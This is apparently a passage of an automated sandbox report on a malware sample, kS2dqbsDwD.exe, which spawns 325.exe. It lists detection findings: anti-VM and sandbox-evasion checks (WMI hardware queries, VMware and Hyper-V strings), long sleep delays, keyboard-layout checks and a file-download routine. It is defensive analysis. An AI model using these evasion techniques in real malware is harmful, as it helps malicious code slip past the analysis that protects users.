                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Yara detected AntiVM3Show sources
                    Source: Yara matchFile source: 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 325.exe PID: 4796, type: MEMORY
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\AppData\Roaming\325.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\325.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\325.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\325.exeWindow / User API: threadDelayed 440
                    Source: C:\Users\user\AppData\Roaming\325.exeWindow / User API: threadDelayed 7193
                    Source: C:\Users\user\AppData\Roaming\325.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Roaming\325.exe TID: 3868Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\325.exe TID: 5044Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\325.exe TID: 5644Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\325.exe TID: 3348Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140013FF0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140014030h country: Spanish (es)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140014380 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 00000001400144F3h country: Russian (ru)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400055F0 GetKeyboardLayout followed by cmp: cmp ebx, 0ah and CTI: jl 0000000140005720h country: Spanish (es)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014000DAA0 GetKeyboardLayout followed by cmp: cmp word ptr [r14+02h], bp and CTI: jne 000000014000DBAAh
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp word ptr [rbx], ax and CTI: je 0000000140046041h
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140045F13h
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140087A90 GetFileAttributesW,FindFirstFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140087B90 FindFirstFileW,FindClose,FindFirstFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D080 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140062320 GetFileAttributesW,FindFirstFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C2390 FindFirstFileW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D405 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D40F SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D419 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D423 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D44D SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D478 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D4A0 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D4BE SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D4DF SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D500 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D792 FindFirstFileW,GetLastError,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D7E0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D990 SystemTimeToFileTime,LocalFileTimeToFileTime,GetLastError,GetSystemTimeAsFileTime,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140061A30 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004CAE0 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140032DC0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004DFA0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,
                    Source: C:\Users\user\AppData\Roaming\325.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\325.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\325.exeThread delayed: delay time: 922337203685477
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: vmware
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: kS2dqbsDwD.exeBinary or memory string: Hyper-V RAW
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: VMWARE
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C2648 GetStringTypeW,GetProcessHeap,IsValidCodePage,
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400BC054 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C24B8 SetUnhandledExceptionFilter,
                    Source: C:\Users\user\AppData\Roaming\325.exeMemory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140010F60 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140062600 mouse_event,
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess created: C:\Users\user\AppData\Roaming\325.exe {path}
                    Source: kS2dqbsDwD.exeBinary or memory string: Program Manager
                    Source: kS2dqbsDwD.exeBinary or memory string: Shell_TrayWnd
                    Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidgroupclass%s%uProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory"
                    Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpBinary or memory string: regk-hookm-hook2-hooksjoypollPART%i-%i(no)%s%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%u...%s[%Iu of %Iu]: %-1.60s%s\:\:HKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264LineRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPClipboardAllComSpecFalseProgramFilesTrueAhkPathAhkVersionAppDataAppDataCommonBatchLinesCaretXCaretYComputerNameControlDelayCoordModeCaretCoordModeMenuCoordModeMouseCoordModePixelCoordModeToolTipCursorDDDDDDDDDDefaultGuiDefaultListViewDefaultMouseSpeedDefaultTreeViewDesktopDesktopCommonEndCharEventInfoExitReasonFormatFloatFormatIntegerGuiControlEventGuiEventGuiHeightGuiWidthGuiXGuiYHourIconFileIconHiddenIconNumberIconTipIndexIPAddress1IPAddress2IPAddress3IPAddress4Is64bitOSIsAdminIsCompiledIsCriticalIsPausedIsSuspendedIsUnicodeKeyDelayKeyDelayPlayKeyDurationKeyDurationPlayLanguageLastErrorLineFileLineNumberLoopFieldLoopFileAttribLoopFileDirLoopFileExtLoopFileFullPathLoopFileLongPathLoopFileNameLoopFileShortNameLoopFileShortPathLoopFileSizeLoopFileSizeKBLoopFileSizeMBLoopFileTimeAccessedLoopFileTimeCreatedLoopFileTimeModifiedLoopReadLineLoopRegKeyLoopRegNameLoopRegSubKeyLoopRegTimeModifiedLoopRegTypeMDayMinMMMMMMMMMMonMouseDelayMouseDelayPlayMSecMyDocumentsNowNowUTCNumBatchLinesOSTypeOSVersionPriorHotkeyPriorKeyProgramsProgramsCommonPtrSizeRegViewScreenDPIScreenHeightScreenWidthScriptDirScriptFullPathScriptHwndScriptNameSecStartMenuStartMenuCommonStartupStartupCommonStoreCapslockModeThisFuncThisHotkeyThisLabelThisMenuThisMenuItemThisMenuItemPosTickCountTimeIdleTimeIdlePhysicalTimeSincePriorHotkeyTimeSinceThisHotkeyTitleMatchModeTitleMatchModeSpeedUserNameWDayWinDelayWinDirWorkingDirYDayYearYWeekYYYYRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Users\user\AppData\Roaming\325.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
